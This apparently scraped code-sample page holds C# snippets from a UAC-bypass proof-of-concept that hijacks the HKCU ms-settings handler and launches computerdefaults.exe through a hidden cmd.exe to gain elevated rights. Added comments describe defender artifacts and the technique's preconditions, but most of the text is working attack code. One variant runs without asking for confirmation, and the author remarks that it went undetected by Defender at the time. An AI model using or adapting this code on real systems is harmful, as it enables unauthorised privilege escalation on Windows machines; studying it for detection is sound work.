Beispiel #1
        /// <summary>
        /// Proof-of-concept for the per-user <c>ms-settings</c> handler hijack, a UAC bypass
        /// (MITRE ATT&amp;CK T1548.002). If the current principal is not in the Administrator
        /// role, the method registers this executable as the HKCU <c>ms-settings</c> open
        /// command, launches <c>computerdefaults.exe</c> via <c>cmd.exe</c> and kills the
        /// current process. Otherwise it only blanks the command's default value.
        /// </summary>
        /// <remarks>
        /// Defender notes: every write lands under HKCU, so no privilege is needed to plant the
        /// handler. The observable artifacts are the creation of
        /// <c>HKCU\Software\Classes\ms-settings\shell\open\command</c> together with a
        /// <c>DelegateExecute</c> value, typically followed by <c>computerdefaults.exe</c>
        /// starting a child process it would not normally start. The technique is generally
        /// reported to depend on the user being a local administrator with UAC below
        /// "Always notify"; working as a standard user or raising the UAC level removes that
        /// precondition.
        /// </remarks>
        public static void UAC()
        {
            // Role check on the current token. With UAC enabled, an administrator running
            // unelevated reports false here, so this branch covers "not elevated" as well as
            // "not an admin".
            WindowsPrincipal windowsPrincipal = new WindowsPrincipal(WindowsIdentity.GetCurrent());

            if (!windowsPrincipal.IsInRole(WindowsBuiltInRole.Administrator))
            {
                // Bypass.Z opens the named key under HKCU\Software and creates it when
                // Bypass.checksubkey rejects the opened handle, so the path is built one
                // level at a time. Only the last handle is kept.
                Bypass.Z("Classes");
                Bypass.Z("Classes\\ms-settings");
                Bypass.Z("Classes\\ms-settings\\shell");
                Bypass.Z("Classes\\ms-settings\\shell\\open");
                RegistryKey registryKey = Bypass.Z("Classes\\ms-settings\\shell\\open\\command");
                // Full path of the running assembly; it becomes the handler command below.
                string      cpath       = System.Reflection.Assembly.GetExecutingAssembly().Location;
                // Default value of the command key = this executable.
                registryKey.SetValue("", cpath, RegistryValueKind.String);
                // DelegateExecute is written as DWORD 0. Monitoring rules for this technique
                // usually key on the value being present under this HKCU path, not on its data.
                registryKey.SetValue("DelegateExecute", 0, RegistryValueKind.DWord);
                registryKey.Close();
                try
                {
                    // Starts computerdefaults.exe through a hidden cmd.exe (CreateNoWindow).
                    Process.Start(new ProcessStartInfo
                    {
                        CreateNoWindow  = true,
                        UseShellExecute = false,
                        FileName        = "cmd.exe",
                        Arguments       = "/c start computerdefaults.exe"
                    });
                }
                // NOTE(review): a failed launch is swallowed silently; nothing is logged.
                catch { }
                // The process terminates itself whether or not the launch succeeded. The
                // handler written above stays in the registry until something removes it.
                Process.GetCurrentProcess().Kill();
            }
            else
            {
                // Already in the Administrator role: only the default value is blanked. The
                // key chain and the DelegateExecute value are not removed by this branch.
                // NOTE(review): registryKey2 is never closed or disposed.
                RegistryKey registryKey2 = Bypass.Z("Classes\\ms-settings\\shell\\open\\command");
                registryKey2.SetValue("", "", RegistryValueKind.String);
            }
        }
Beispiel #2
        /// <summary>
        /// Entry point of the proof-of-concept. When <c>IsAdministrator()</c> (defined outside
        /// this excerpt) returns false, it asks the user for confirmation and, on "Yes", calls
        /// <c>Bypass.UAC()</c>. When it returns true, it starts <c>cmd.exe</c>, deletes the
        /// <c>shell</c> subtree under <c>HKCU\Software\Classes\ms-settings</c> and shows a
        /// message box.
        /// </summary>
        /// <remarks>
        /// Defender note: the elevated branch removes the registry handler again, so the
        /// artifact is short-lived. Detection has to rely on registry and process telemetry
        /// captured at the time of the write, not on inspecting the hive afterwards.
        /// </remarks>
        static void Main()
        {
            try
            {
                if (!IsAdministrator())
                {
                    // Explicit user confirmation before anything is written to the registry.
                    DialogResult result = MessageBox.Show("Process is not elevated want to exploit?", "UAC_Bypass_POC", MessageBoxButtons.YesNoCancel);

                    if (result == DialogResult.Yes)
                    {
                        Bypass.UAC();
                    }
                    // Cancel and No are handled identically: exit without side effects.
                    else if (result == DialogResult.Cancel)
                    {
                        Environment.Exit(0);
                    }
                    else if (result == DialogResult.No)
                    {
                        Environment.Exit(0);
                    }
                }
                // NOTE(review): this second IsAdministrator() call is redundant with the
                // check above; a plain else would be equivalent if the result is stable.
                else if (IsAdministrator())
                {
                    string command = "/c start cmd.exe "; // command line handed to cmd.exe in this branch
                    Process.Start("CMD.exe", command);
                    // OpenSubKey returns null when the key does not exist; the resulting
                    // NullReferenceException ends up in the catch-all below.
                    RegistryKey uac_clean = Registry.CurrentUser.OpenSubKey("Software\\Classes\\ms-settings", true);
                    // Removes the hijacked shell\open\command handler and everything below "shell".
                    uac_clean.DeleteSubKeyTree("shell");
                    uac_clean.Close();
                    System.Windows.Forms.MessageBox.Show("Process Elevated!");
                }
            // NOTE(review): every exception is swallowed and the process exits with code 0,
            // so failures (including a failed cleanup) are indistinguishable from success.
            }catch { Environment.Exit(0); }
        }
Beispiel #3
        /// <summary>
        /// Returns a writable handle to <c>HKCU\Software\{x}</c>, creating the key when the
        /// opened handle is rejected by <c>Bypass.checksubkey</c> (defined outside this excerpt).
        /// </summary>
        /// <param name="x">Sub-key path relative to <c>HKCU\Software</c>.</param>
        /// <returns>The opened or newly created registry key.</returns>
        /// <remarks>
        /// All access goes through <c>Registry.CurrentUser</c>, so the caller needs no
        /// elevated rights; writes made through the returned handle are per-user only.
        /// </remarks>
        public static RegistryKey Z(string x)
        {
            string subKeyPath = "Software\\" + x;
            RegistryKey existing = Registry.CurrentUser.OpenSubKey(subKeyPath, true);

            // Keep the handle when the existence check accepts it.
            if (Bypass.checksubkey(existing))
            {
                return existing;
            }

            // Otherwise create the key (CreateSubKey also returns a writable handle).
            return Registry.CurrentUser.CreateSubKey(subKeyPath);
        }
Beispiel #4
 /// <summary>
 /// Entry point of a variant of the proof-of-concept that asks for no confirmation. When
 /// <c>IsAdministrator()</c> (defined outside this excerpt) returns false it calls
 /// <c>Bypass.UAC()</c> directly; when it returns true it starts <c>cmd.exe</c> and deletes
 /// the <c>shell</c> subtree under <c>HKCU\Software\Classes\ms-settings</c>.
 /// </summary>
 /// <remarks>
 /// Defender note: the registry handler is removed again in the elevated branch, so it is
 /// only visible to telemetry that records the write when it happens.
 /// </remarks>
 static void Main()
 {
     try
     {
         if (!IsAdministrator())
         {
             Bypass.UAC();
         }
         // NOTE(review): the second IsAdministrator() call is redundant with the check above.
         else if (IsAdministrator())
         {
             // Author's observation, dated 5-02-2021: the binary was not flagged by Defender
             // at that time. This is a point-in-time statement about signature detection;
             // behaviour-based rules on the HKCU ms-settings handler write and on the child
             // process of the auto-elevated binary do not depend on the binary itself.
             string WhatToElevate = "cmd.exe"; // the author's example program for this branch
             Process.Start("CMD.exe", "/c start " + WhatToElevate);
             // OpenSubKey returns null when the key is missing; the resulting exception is
             // absorbed by the catch-all below.
             RegistryKey uac_clean = Registry.CurrentUser.OpenSubKey("Software\\Classes\\ms-settings", true);
             uac_clean.DeleteSubKeyTree("shell"); // author's note: without this cleanup the Windows right-click menu breaks
             uac_clean.Close();
         }
     // NOTE(review): every exception is swallowed and the process exits with code 0.
     }catch { Environment.Exit(0); }
 }
Beispiel #5
        /// <summary>
        /// Reads the <c>Version</c> property of the <c>Win32_OperatingSystem</c> object
        /// returned by <c>Bypass.GetMngObj</c> (defined outside this excerpt).
        /// </summary>
        /// <returns>
        /// The version string; <see cref="string.Empty"/> when no object is returned or any
        /// exception is thrown; <c>null</c> when the property is not a string.
        /// </returns>
        public static string GetOsVer()
        {
            try
            {
                ManagementObject osInfo = Bypass.GetMngObj("Win32_OperatingSystem");

                // No management object available: report an empty version.
                if (osInfo == null)
                {
                    return string.Empty;
                }

                // "as" yields null instead of throwing when the property is not a string.
                return osInfo["Version"] as string;
            }
            catch (Exception)
            {
                // Any failure of the query is reported as an empty version.
                return string.Empty;
            }
        }